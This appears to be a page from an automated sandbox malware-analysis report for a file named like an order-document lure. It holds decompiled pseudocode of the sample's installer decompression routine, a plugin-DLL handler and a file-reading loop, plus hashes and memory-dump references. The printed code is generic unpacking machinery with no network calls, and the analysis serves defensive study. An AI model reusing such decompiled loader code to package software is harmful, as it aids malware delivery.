									__esi = _v8 + 0x1c8 + _v60 * 2;
									goto L120;
								}
								__eax = _v44;
								goto L89;
							case 0xb:
								__eflags = _v68;
								if(_v68 != 0) {
									__ecx = _v40;
									__eax = _v36;
									_v36 = _v40;
								} else {
									__eax = _v40;
								}
								__ecx = _v44;
								_v40 = _v44;
								L89:
								__ecx = _v48;
								_v48 = __eax;
								_v44 = _v48;
								L90:
								__eax = _v8;
								_v132 = 0x15;
								__eax = _v8 + 0xa68;
								_v92 = _v8 + 0xa68;
								L70:
								__esi = _v92;
								_v136 = 0x12;
								L120:
								_v88 = _t544;
								goto L121;
							case 0xc:
								while(1) {
									L91:
									__eflags = _v112;
									if(_v112 == 0) {
										break;
									}
									__ecx = _v116;
									__eax = _v16;
									_v20 = _v20 << 8;
									__ecx =  *_v116 & 0x000000ff;
									_v112 = _v112 - 1;
									_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
									_t321 =  &_v116;
									 *_t321 = _v116 + 1;
									__eflags =  *_t321;
									_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
									__eax = _v48;
									while(1) {
										_t325 =  &_v76;
										 *_t325 = _v76 - 1;
										__eflags =  *_t325;
										__eflags = _v76;
										if(_v76 <= 0) {
											break;
										}
										__ecx = _v16;
										__ebx = __ebx + __ebx;
										_v20 = _v20 >> 1;
										__eflags = _v16 - _v20;
										_v72 = __ebx;
										if(_v16 >= _v20) {
											__ecx = _v20;
											_v16 = _v16 - _v20;
											__ebx = __ebx | 0x00000001;
											__eflags = __ebx;
											_v72 = __ebx;
										}
										__eflags = _v20 - 0x1000000;
										if(_v20 >= 0x1000000) {
											continue;
										} else {
											goto L91;
										}
									}
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									while(1) {
										__eax = _v68;
										__eflags = _v76 - _v68;
										if(_v76 >= _v68) {
											break;
										}
										__eax = _v84;
										_v20 = _v20 >> 0xb;
										__edi = _v84 + _v84;
										__eax = _v92;
										__esi = __edi + __eax;
										_v88 = __esi;
										__ax =  *__esi;
										__ecx = __ax & 0x0000ffff;
										__edx = (_v20 >> 0xb) * __ecx;
										__eflags = _v16 - __edx;
										if(_v16 >= __edx) {
											__ecx = 0;
											_v20 = _v20 - __edx;
											__ecx = 1;
											_v16 = _v16 - __edx;
											__ebx = 1;
											__ecx = _v76;
											__ebx = 1 << __cl;
											__ecx = 1 << __cl;
											__ebx = _v72;
											__ebx = _v72 | __ecx;
											__cx = __ax;
											__cx = __ax >> 5;
											__eax = __eax - __ecx;
											__edi = __edi + 1;
											__eflags = __edi;
											_v72 = __ebx;
											 *__esi = __ax;
											_v84 = __edi;
										} else {
											_v20 = __edx;
											0x800 = 0x800 - __ecx;
											0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
											_v84 = _v84 << 1;
											 *__esi = __dx;
										}
										__eflags = _v20 - 0x1000000;
										if(_v20 >= 0x1000000) {
											L103:
											_t355 =  &_v76;
											 *_t355 = _v76 + 1;
											__eflags =  *_t355;
											continue;
										} else {
											__eflags = _v112;
											if(_v112 == 0) {
												_v140 = 0x10;
												goto L141;
											}
											__ecx = _v116;
											__eax = _v16;
											_v20 = _v20 << 8;
											__ecx =  *_v116 & 0x000000ff;
											_v112 = _v112 - 1;
											_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
											_t352 =  &_v116;
											 *_t352 = _v116 + 1;
											__eflags =  *_t352;
											_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
											goto L103;
										}
									}
									_t378 =  &_v48;
									 *_t378 = _v48 + __ebx;
									__eflags =  *_t378;
									_t380 =  &_v48;
									 *_t380 = _v48 + 1;
									__eflags =  *_t380;
									__eax = _v48;
									__eflags = __eax;
									if(__eax == 0) {
										_v52 = _v52 | 0xffffffff;
										goto L141;
									}
									__eflags = __eax - _v100;
									if(__eax > _v100) {
										goto L142;
									}
									_v52 = _v52 + 2;
									__eax = _v52;
									_t387 =  &_v100;
									 *_t387 = _v100 + _v52;
									__eflags =  *_t387;
									while(1) {
										__eflags = _v104;
										if(_v104 == 0) {
											break;
										}
										__eax = _v24;
										__eax = _v24 - _v48;
										__eflags = __eax - _v120;
										if(__eax >= _v120) {
											__eax = __eax + _v120;
											__eflags = __eax;
										}
										__edx = _v12;
										__cl =  *(__eax + __edx);
										__eax = _v24;
										_v96 = __cl;
										 *(__eax + __edx) = __cl;
										__eax = __eax + 1;
										__edx = 0;
										_t401 = __eax % _v120;
										__eax = __eax / _v120;
										__edx = _t401;
										__eax = _v108;
										_v108 = _v108 + 1;
										_v104 = _v104 - 1;
										_v52 = _v52 - 1;
										__eflags = _v52;
										 *_v108 = __cl;
										_v24 = _t401;
										if(_v52 > 0) {
											continue;
										}
										goto L81;
									}
									_v140 = 0x1c;
									goto L141;
								}
								_v140 = 0xc;
								goto L141;
							case 0xd:
								L39:
								__eflags = _v112;
								if(_v112 == 0) {
									_v140 = 0xd;
									L141:
									_push(0x22);
									_pop(_t492);
									memcpy(_v148,  &_v140, _t492 << 2);
									return 0;
								}
								__ecx = _v116;
								__eax = _v16;
								_v20 = _v20 << 8;
								__ecx =  *_v116 & 0x000000ff;
								_v112 = _v112 - 1;
								_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
								_t127 =  &_v116;
								 *_t127 = _v116 + 1;
								__eflags =  *_t127;
								_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
								L41:
								__eax = _v68;
								__eflags = _v76 - _v68;
								if(_v76 != _v68) {
									while(1) {
										__eflags = __ebx - 0x100;
										if(__ebx >= 0x100) {
											break;
										}
										__eax = _v92;
										__edx = __ebx + __ebx;
										__ecx = _v20;
										__esi = __edx + __eax;
										__ecx = _v20 >> 0xb;
										__ax =  *__esi;
										_v88 = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = (_v20 >> 0xb) * __edi;
										__eflags = _v16 - __ecx;
										if(_v16 >= __ecx) {
											_v20 = _v20 - __ecx;
											_v16 = _v16 - __ecx;
											__cx = __ax;
											_t175 = __edx + 1; // 0x1
											__ebx = _t175;
											__cx = __ax >> 5;
											__eflags = __eax;
											 *__esi = __ax;
										} else {
											_v20 = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										__eflags = _v20 - 0x1000000;
										_v72 = __ebx;
										if(_v20 >= 0x1000000) {
											continue;
										} else {
											__eflags = _v112;
											if(_v112 == 0) {
												_v140 = 0xe;
												goto L141;
											} else {
												__ecx = _v116;
												__eax = _v16;
												_v20 = _v20 << 8;
												__ecx =  *_v116 & 0x000000ff;
												_v112 = _v112 - 1;
												_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
												_t161 =  &_v116;
												 *_t161 = _v116 + 1;
												__eflags =  *_t161;
												_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
												continue;
											}
											break;
										}
									}
									L56:
									_t178 =  &_v56;
									 *_t178 = _v56 & 0x00000000;
									__eflags =  *_t178;
									L57:
									__al = _v72;
									_v96 = _v72;
									__eflags = _v104;
									if(_v104 == 0) {
										_v140 = 0x1a;
										goto L141;
									}
									__ecx = _v108;
									__al = _v96;
									__edx = _v12;
									_v100 = _v100 + 1;
									_v108 = _v108 + 1;
									_v104 = _v104 - 1;
									 *_v108 = __al;
									__ecx = _v24;
									 *(_v12 + __ecx) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t197 = __eax % _v120;
									__eax = __eax / _v120;
									__edx = _t197;
									L80:
									_v24 = __edx;
									L81:
									_v140 = 2;
									goto L3;
								}
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									goto L56;
								}
								L43:
								__eax = _v95 & 0x000000ff;
								_v95 = _v95 << 1;
								__ecx = _v92;
								__eax = (_v95 & 0x000000ff) >> 7;
								_v76 = __eax;
								__eax = __eax + 1;
								__eax = __eax << 8;
								__eax = __eax + __ebx;
								__esi = _v92 + __eax * 2;
								_v20 = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edx = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edx;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_v68 = 1;
									__cx = __ax >> 5;
									__eflags = __eax;
									__ebx = __ebx + __ebx + 1;
									 *__esi = __ax;
								} else {
									_v68 = _v68 & 0x00000000;
									_v20 = __ecx;
									0x800 = 0x800 - __edx;
									0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									goto L41;
								} else {
									goto L39;
								}
						}
					}
					L142:
					_t456 = _t455 | 0xffffffff;
					return _t456;
				}
				return 1;
			}

0x00406586
0x0040658d
0x00406593
0x00406599
0x004065a9
0x004065a9
0x004065a9
0x004065b2
0x00000000
0x00000000
0x004065b8
0x00000000
0x004065bf
0x004065c3
0x00000000
0x00000000
0x004065cc
0x004065cf
0x004065d2
0x004065d4
0x004065d6
0x00000000
0x00000000
0x004065dc
0x004065df
0x004065e1
0x004065e2
0x004065e5
0x004065e7
0x004065e8
0x004065ea
0x004065ed
0x004065f2
0x004065f7
0x00406600
0x00406613
0x00406616
0x0040661f
0x00406622
0x0040664a
0x0040664a
0x0040664c
0x0040665a
0x0040665a
0x0040665e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040664e
0x0040664e
0x00406651
0x00406651
0x00406652
0x00406652
0x00000000
0x0040664e
0x00406624
0x00406628
0x0040662d
0x0040662d
0x00406636
0x0040663c
0x0040663e
0x00406641
0x00000000
0x00406647
0x00406647
0x00000000
0x00406647
0x00000000
0x00406664
0x00406664
0x00406668
0x00406f14
0x00000000
0x00406f14
0x00406671
0x00406681
0x00406684
0x00406687
0x00406687
0x00406687
0x0040668a
0x0040668a
0x0040668e
0x00000000
0x00000000
0x00406690
0x00406693
0x00406696
0x004066c0
0x004066c6
0x004066cd
0x00000000
0x004066cd
0x00406698
0x0040669c
0x0040669f
0x004066a4
0x004066a4
0x004066af
0x004066b5
0x004066b7
0x004066ba
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004066ff
0x00406705
0x00406708
0x00406715
0x0040671d
0x00000000
0x00000000
0x004066d4
0x004066d4
0x004066d8
0x00406f23
0x00000000
0x00406f23
0x004066e4
0x004066ef
0x004066ef
0x004066ef
0x004066f2
0x004066f5
0x004066f8
0x004066fb
0x004066fd
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d94
0x00406d94
0x00406d9a
0x00406da0
0x00406da3
0x00406da6
0x00406dc0
0x00406dc3
0x00406dc9
0x00406dd4
0x00406dd4
0x00406dd6
0x00406da8
0x00406da8
0x00406db7
0x00406dbb
0x00406dbb
0x00406dd9
0x00406de0
0x00000000
0x00000000
0x00000000
0x00000000
0x00406de2
0x00406de2
0x00406de6
0x00406f95
0x00000000
0x00406f95
0x00406df2
0x00406df9
0x00406e01
0x00406e01
0x00406e01
0x00406e04
0x00406e07
0x00406e07
0x00406e0d
0x00000000
0x00000000
0x00406725
0x00406727
0x0040672a
0x0040679b
0x0040679e
0x004067a1
0x004067a8
0x004067b2
0x00000000
0x004067b2
0x0040672c
0x00406730
0x00406733
0x00406735
0x00406738
0x0040673b
0x0040673d
0x00406740
0x00406742
0x00406747
0x0040674a
0x0040674d
0x00406751
0x00406758
0x0040675b
0x00406762
0x00406766
0x0040676e
0x0040676e
0x0040676e
0x00406768
0x00406768
0x00406768
0x0040675d
0x0040675d
0x0040675d
0x00406772
0x00406775
0x00406793
0x00406795
0x00406968
0x00406968
0x0040696b
0x0040696e
0x00406971
0x00406974
0x00406977
0x0040697a
0x0040697d
0x00406980
0x00406983
0x00406986
0x0040699e
0x004069a1
0x004069a4
0x004069a7
0x004069a7
0x004069aa
0x004069ae
0x004069b0
0x00406988
0x00406988
0x00406990
0x00406995
0x00406997
0x00406999
0x00406999
0x004069b3
0x004069ba
0x004069bd
0x0040693b
0x0040693f
0x00406f47
0x00000000
0x00406945
0x00406945
0x00406948
0x0040694b
0x0040694f
0x00406952
0x00406958
0x0040695a
0x0040695a
0x0040695a
0x0040695d
0x00000000
0x0040695d
0x00000000
0x0040693f
0x00406960
0x00406960
0x00406960
0x00000000
0x00406777
0x00406777
0x0040677a
0x0040677d
0x00406780
0x00406782
0x00406782
0x00406782
0x00406785
0x00406788
0x0040678a
0x0040678b
0x0040678e
0x00000000
0x0040678e
0x00000000
0x004069c4
0x004069c4
0x004069c8
0x004069e6
0x004069e9
0x004069f0
0x004069f3
0x004069f6
0x004069f9
0x004069fc
0x004069ff
0x00406a01
0x00406a08
0x00406a09
0x00406a0b
0x00406a0e
0x00406a11
0x00406a14
0x00406a14
0x00406a19
0x00000000
0x00406a19
0x004069ca
0x004069cd
0x004069d0
0x004069da
0x00000000
0x00000000
0x00406a2e
0x00406a32
0x00406a55
0x00406a58
0x00406a5b
0x00406a65
0x00406a34
0x00406a34
0x00406a37
0x00406a3a
0x00406a3d
0x00406a4a
0x00406a4d
0x00406a4d
0x00000000
0x00000000
0x00406a71
0x00406a75
0x00000000
0x00000000
0x00406a7b
0x00406a7f
0x00000000
0x00000000
0x00406a85
0x00406a87
0x00406a8e
0x00406a92
0x00406a95
0x00406a99
0x00406f5f
0x00000000
0x00406f5f
0x00406a9f
0x00406aa2
0x00406aa5
0x00406aa8
0x00406aaa
0x00406aaa
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406abd
0x00406abf
0x00406abf
0x00406abf
0x00406ac2
0x00406ac5
0x00406ac8
0x00406acb
0x00406acb
0x00406acb
0x00406ace
0x00000000
0x00000000
0x00406ae2
0x00406ae6
0x00406aed
0x00406af0
0x00406af3
0x00406afd
0x00000000
0x00406afd
0x00406ae8
0x00000000
0x00000000
0x00406b09
0x00406b0d
0x00406b14
0x00406b17
0x00406b1a
0x00406b0f
0x00406b0f
0x00406b0f
0x00406b1d
0x00406b20
0x00406b23
0x00406b23
0x00406b26
0x00406b29
0x00406b2c
0x00406b2c
0x00406b2f
0x00406b36
0x00406b3b
0x00406a1c
0x00406a1c
0x00406a1f
0x00406d91
0x00406d91
0x00000000
0x00000000
0x00406bc9
0x00406bc9
0x00406bc9
0x00406bcd
0x00000000
0x00000000
0x00406bd3
0x00406bd6
0x00406bd9
0x00406bdd
0x00406be0
0x00406be6
0x00406be8
0x00406be8
0x00406be8
0x00406beb
0x00406bee
0x00406bf1
0x00406bf1
0x00406bf1
0x00406bf1
0x00406bf4
0x00406bf8
0x00000000
0x00000000
0x00406bfa
0x00406bfd
0x00406bff
0x00406c02
0x00406c05
0x00406c08
0x00406c0a
0x00406c0d
0x00406c10
0x00406c10
0x00406c13
0x00406c13
0x00406c16
0x00406c1d
0x00000000
0x00406c1f
0x00000000
0x00406c1f
0x00406c1d
0x00406c24
0x00406c26
0x00406c2d
0x00406c30
0x00406c33
0x00406c33
0x00406c38
0x00406c3a
0x00406c3d
0x00406c44
0x00406c47
0x00406c74
0x00406c74
0x00406c77
0x00406c7a
0x00000000
0x00000000
0x00406c7c
0x00406c82
0x00406c85
0x00406c88
0x00406c8b
0x00406c8e
0x00406c91
0x00406c94
0x00406c97
0x00406c9a
0x00406c9d
0x00406cb6
0x00406cb8
0x00406cbb
0x00406cbc
0x00406cbf
0x00406cc1
0x00406cc4
0x00406cc6
0x00406cc8
0x00406ccb
0x00406ccd
0x00406cd0
0x00406cd4
0x00406cd6
0x00406cd6
0x00406cd7
0x00406cda
0x00406cdd
0x00406c9f
0x00406c9f
0x00406ca7
0x00406cac
0x00406cae
0x00406cb1
0x00406cb1
0x00406ce0
0x00406ce7
0x00406c71
0x00406c71
0x00406c71
0x00406c71
0x00000000
0x00406ce9
0x00406c4c
0x00406c50
0x00406f77
0x00000000
0x00406f77
0x00406c56
0x00406c59
0x00406c5c
0x00406c60
0x00406c63
0x00406c69
0x00406c6b
0x00406c6b
0x00406c6b
0x00406c6e
0x00000000
0x00406c6e
0x00406ce7
0x00406cee
0x00406cee
0x00406cee
0x00406cf1
0x00406cf1
0x00406cf1
0x00406cf4
0x00406cf7
0x00406cf9
0x00406f83
0x00000000
0x00406f83
0x00406cff
0x00406d02
0x00000000
0x00000000
0x00406d08
0x00406d0c
0x00406d0f
0x00406d0f
0x00406d0f
0x00406d12
0x00406d12
0x00406d16
0x00000000
0x00000000
0x00406d1c
0x00406d1f
0x00406d22
0x00406d25
0x00406d27
0x00406d27
0x00406d27
0x00406d2a
0x00406d2d
0x00406d30
0x00406d33
0x00406d36
0x00406d39
0x00406d3a
0x00406d3c
0x00406d3c
0x00406d3c
0x00406d3f
0x00406d42
0x00406d45
0x00406d48
0x00406d4b
0x00406d4f
0x00406d51
0x00406d54
0x00000000
0x00000000
0x00000000
0x00406d56
0x00406f89
0x00000000
0x00406f89
0x00406f6b
0x00000000
0x00000000
0x004067be
0x004067be
0x004067c2
0x00406f2f
0x00406fab
0x00406fb1
0x00406fb3
0x00406fba
0x00000000
0x00406fbc
0x004067c8
0x004067cb
0x004067ce
0x004067d2
0x004067d5
0x004067db
0x004067dd
0x004067dd
0x004067dd
0x004067e0
0x004067e3
0x004067e3
0x004067e6
0x004067e9
0x0040689c
0x0040689c
0x004068a2
0x00000000
0x00000000
0x004068a4
0x004068a7
0x004068aa
0x004068ad
0x004068b0
0x004068b3
0x004068b6
0x004068b9
0x004068bc
0x004068bf
0x004068c2
0x004068da
0x004068dd
0x004068e0
0x004068e3
0x004068e3
0x004068e6
0x004068ea
0x004068ec
0x004068c4
0x004068c4
0x004068cc
0x004068d1
0x004068d3
0x004068d5
0x004068d5
0x004068ef
0x004068f6
0x004068f9
0x00000000
0x004068fb
0x00406877
0x0040687b
0x00406f3b
0x00000000
0x00406881
0x00406881
0x00406884
0x00406887
0x0040688b
0x0040688e
0x00406894
0x00406896
0x00406896
0x00406896
0x00406899
0x00000000
0x00406899
0x00000000
0x0040687b
0x004068f9
0x00406900
0x00406900
0x00406900
0x00406900
0x00406904
0x00406904
0x00406907
0x0040690a
0x0040690e
0x00406f53
0x00000000
0x00406f53
0x00406914
0x00406917
0x0040691a
0x0040691d
0x00406920
0x00406923
0x00406926
0x00406928
0x0040692b
0x0040692e
0x00406931
0x00406933
0x00406933
0x00406933
0x00406ad0
0x00406ad0
0x00406ad3
0x00406ad3
0x00000000
0x00406ad3
0x004067ef
0x004067f5
0x00000000
0x00000000
0x004067fb
0x004067fb
0x004067ff
0x00406802
0x00406805
0x00406808
0x0040680b
0x0040680c
0x0040680f
0x00406811
0x00406817
0x0040681a
0x0040681d
0x00406820
0x00406823
0x00406826
0x00406829
0x00406845
0x00406848
0x0040684b
0x0040684e
0x00406855
0x00406859
0x0040685b
0x0040685f
0x0040682b
0x0040682b
0x0040682f
0x00406837
0x0040683c
0x0040683e
0x00406840
0x00406840
0x00406862
0x00406869
0x0040686c
0x00000000
0x00406872
0x00000000
0x00406872
0x00000000
0x004065b8
0x00406fc0
0x00406fc0
0x00000000
0x00406fc0
0x00000000

Strings

"numeric": "408", "official_name": "Democratic People's Republic of Korea" }, { "alpha_2": "PT", "alpha_3": "PRT", "name": "Portugal", "numeric": "620", "official_name": "Portuguese Republic" }, { "alph, xrefs: 00406576

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID:
String ID: "numeric": "408", "official_name": "Democratic People's Republic of Korea" }, { "alpha_2": "PT", "alpha_3": "PRT", "name": "Portugal", "numeric": "620", "official_name": "Portuguese Republic" }, { "alph
API String ID: 0-208995783
Opcode ID: 8c6c0676c47b070245886c612b6dc18845a4ce32cc894a17ea31aa6889f3f80a
Instruction ID: f9a0fdfb68df0875c036107095c0f8e37124572de3281b7b6a4fcb1f7c3ff658
Opcode Fuzzy Hash: 8c6c0676c47b070245886c612b6dc18845a4ce32cc894a17ea31aa6889f3f80a
Instruction Fuzzy Hash: DF818771D00229DBDF24CFA8D8447AEBBB0FF44305F11856AE856BB280CB785A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 100016BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E100016BD(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				struct HINSTANCE__* _t34;
				intOrPtr _t38;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t50;
				intOrPtr _t53;
				signed int _t57;
				signed int _t61;
				void* _t65;
				void* _t66;
				void* _t70;
				void* _t74;

				_t74 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				 *0x1000405c = _a8;
				 *0x10004060 = _a16;
				 *0x10004064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004038, E10001556);
				_push(1);
				_t34 = E10001A5D();
				_t50 = _t34;
				if(_t50 == 0) {
					L28:
					return _t34;
				} else {
					if( *((intOrPtr*)(_t50 + 4)) != 1) {
						E100021B0(_t50);
					}
					E100021FA(_t65, _t50);
					_t53 =  *((intOrPtr*)(_t50 + 4));
					if(_t53 == 0xffffffff) {
						L14:
						if(( *(_t50 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t50 + 4)) == 0) {
								_t34 = E100023D8(_t50);
							} else {
								_push(_t74);
								_push(_t66);
								_t12 = _t50 + 0x818; // 0x818
								_t57 = 8;
								memcpy( &_v36, _t12, _t57 << 2);
								_t38 = E10001559(_t50);
								_t15 = _t50 + 0x818; // 0x818
								_t70 = _t15;
								 *((intOrPtr*)(_t50 + 0x820)) = _t38;
								 *_t70 = 3;
								E100023D8(_t50);
								_t61 = 8;
								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
							}
						} else {
							E100023D8(_t50);
							_t34 = GlobalFree(E10001266(E10001559(_t50)));
						}
						if( *((intOrPtr*)(_t50 + 4)) != 1) {
							_t34 = E1000239E(_t50);
							if(( *(_t50 + 0x810) & 0x00000040) != 0 &&  *_t50 == 1) {
								_t34 =  *(_t50 + 0x808);
								if(_t34 != 0) {
									_t34 = FreeLibrary(_t34);
								}
							}
							if(( *(_t50 + 0x810) & 0x00000020) != 0) {
								_t34 = E100014E2( *0x10004058);
							}
						}
						if(( *(_t50 + 0x810) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t50);
						}
					}
					_t44 =  *_t50;
					if(_t44 == 0) {
						if(_t53 != 1) {
							goto L14;
						}
						E10002A9F(_t50);
						L12:
						_t50 = _t44;
						L13:
						goto L14;
					}
					_t45 = _t44 - 1;
					if(_t45 == 0) {
						L8:
						_t44 = E100027E4(_t53, _t50); // executed
						goto L12;
					}
					_t46 = _t45 - 1;
					if(_t46 == 0) {
						E10002587(_t50);
						goto L13;
					}
					if(_t46 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x100016bd
0x100016bd
0x100016bd
0x100016c7
0x100016cf
0x100016dc
0x100016ea
0x100016ed
0x100016ef
0x100016f4
0x100016f9
0x1000180c
0x1000180c
0x100016ff
0x10001703
0x10001706
0x1000170b
0x1000170d
0x10001713
0x10001719
0x10001749
0x10001750
0x10001774
0x100017b3
0x10001776
0x10001776
0x10001777
0x1000177a
0x10001780
0x10001784
0x10001787
0x1000178c
0x1000178c
0x10001793
0x10001799
0x1000179f
0x100017ab
0x100017ac
0x100017af
0x10001752
0x10001753
0x10001768
0x10001768
0x100017bd
0x100017c0
0x100017cd
0x100017d4
0x100017dc
0x100017df
0x100017df
0x100017dc
0x100017ec
0x100017f4
0x100017f9
0x100017ec
0x10001801
0x00000000
0x10001803
0x00000000
0x10001804
0x10001801
0x1000171d
0x10001720
0x1000173e
0x00000000
0x00000000
0x10001741
0x10001746
0x10001746
0x10001748
0x00000000
0x10001748
0x10001722
0x10001723
0x1000172b
0x1000172c
0x00000000
0x1000172c
0x10001725
0x10001726
0x10001734
0x00000000
0x10001734
0x10001729
0x00000000
0x00000000
0x00000000
0x10001729

APIs

Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE

GlobalFree.KERNEL32(00000000), ref: 10001768
FreeLibrary.KERNEL32(?), ref: 100017DF
GlobalFree.KERNEL32(00000000), ref: 10001804

Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2

Part of subcall function 10002587: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025F9

Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572

Strings

, xrefs: 100017E5

Memory Dump Source

Source File: 00000002.00000002.23343286065.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.23343244782.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.23343346960.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.23343388834.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpy
String ID:
API String ID: 1791698881-3916222277
Opcode ID: d00fcf5c1a7409290317dea9c84c75534a881091bfcc635988d0727071c870ea
Instruction ID: 474564f2ddd1a30fda7ef2e88bb39d7445f8f4f5c00c78564696995dcbc9c57a
Opcode Fuzzy Hash: d00fcf5c1a7409290317dea9c84c75534a881091bfcc635988d0727071c870ea
Instruction Fuzzy Hash: C4319E79408205DAFB41DF649CC5BCA37ECFB042D5F118465FA0A9A09EDF78A8858B60

Uniqueness

Uniqueness Score: -1.00%

Function 00403146 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00403146(intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t31;
				long _t32;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t32 =  *0x4178dc; // 0x58ea
				_t34 = _t32 -  *0x40b848 + _a4;
				 *0x424730 = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E00402CF9(1);
					return 0;
				}
				E004032C5( *0x4178ec);
				SetFilePointer( *0x40a01c,  *0x40b848, 0, 0); // executed
				 *0x4178e8 = _t34;
				 *0x4178d8 = 0;
				while(1) {
					_t10 =  *0x4178e0; // 0x2d595
					_t31 = 0x4000;
					_t11 = _t10 -  *0x4178ec;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E004032AF(0x4138d8, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x4178ec =  *0x4178ec + _t31;
					 *0x40b868 = 0x4138d8;
					 *0x40b86c = _t31;
					L6:
					L6:
					if( *0x424734 != 0 &&  *0x4247e0 == 0) {
						_t19 =  *0x4178e8; // 0x1559
						 *0x4178d8 = _t19 -  *0x4178dc - _a4 +  *0x40b848;
						E00402CF9(0);
					}
					 *0x40b870 = 0x40b8d8;
					 *0x40b874 = 0x8000; // executed
					_t14 = E00406576(0x40b850); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40b870; // 0x40e0fc
					_t37 = _t36 - 0x40b8d8;
					if(_t37 == 0) {
						__eflags =  *0x40b86c; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x4178dc; // 0x58ea
						if(_t16 -  *0x40b848 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E00405CD9( *0x40a01c, 0x40b8d8, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40b848 =  *0x40b848 + _t37;
					_t49 =  *0x40b86c; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
